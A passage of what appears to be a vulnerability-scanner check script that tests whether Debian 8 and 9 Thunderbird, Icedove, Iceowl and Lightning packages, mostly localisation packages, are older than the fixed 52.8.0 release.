ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-hy-am\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-id\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-is\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-it\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ja\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-kab\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ko\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-lt\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-nb-no\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-nl\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-nn-no\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-pa-in\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-pl\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-pt-br\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-pt-pt\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-rm\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ro\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ru\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-si\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-sk\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-sl\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-sq\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-sr\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-sv-se\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ta-lk\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-tr\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-uk\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-vi\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-zh-cn\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-zh-tw\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"calendar-google-provider\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-dbg\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-dev\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-all\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ar\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ast\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-be\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-bg\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-bn-bd\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-br\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ca\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-cs\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-da\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-de\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-dsb\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-el\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-en-gb\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-es-ar\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-es-es\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-et\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-eu\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-fi\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-fr\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-fy-nl\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ga-ie\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-gd\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-gl\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-he\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-hr\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-hsb\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-hu\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-hy-am\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-id\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-is\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-it\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ja\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-kab\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ko\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-lt\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-nb-no\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-nl\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-nn-no\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-pa-in\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-pl\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-pt-br\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-pt-pt\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-rm\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ro\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ru\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-si\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-sk\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-sl\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-sq\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-sr\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-sv-se\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ta-lk\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-tr\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-uk\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-vi\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-zh-cn\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-zh-tw\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-extension\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ar\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ast\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-be\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-bg\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-bn-bd\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-br\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ca\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-cs\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-cy\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-da\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-de\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-dsb\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-el\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-en-gb\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-es-ar\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-es-es\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-et\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-eu\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-fi\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-fr\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-fy-nl\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ga-ie\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-gd\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-gl\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-he\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-hr\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-hsb\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-hu\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-hy-am\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-id\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-is\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-it\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ja\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-kab\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ko\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-lt\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-nb-no\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-nl\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-nn-no\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-pa-in\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-pl\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-pt-br\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-pt-pt\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-rm\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ro\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ru\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-si\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-sk\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-sl\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-sq\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-sr\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-sv-se\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ta-lk\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-tr\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-uk\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-vi\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-zh-cn\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-zh-tw\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ar\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ast\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-be\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-bg\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-bn-bd\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-br\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ca\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-cs\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-cy\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-da\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-de\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-dsb\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-el\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-en-gb\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-es-ar\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-es-es\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-et\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-eu\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-fi\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-fr\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-fy-nl\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ga-ie\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-gd\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-gl\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-he\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-hr\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += 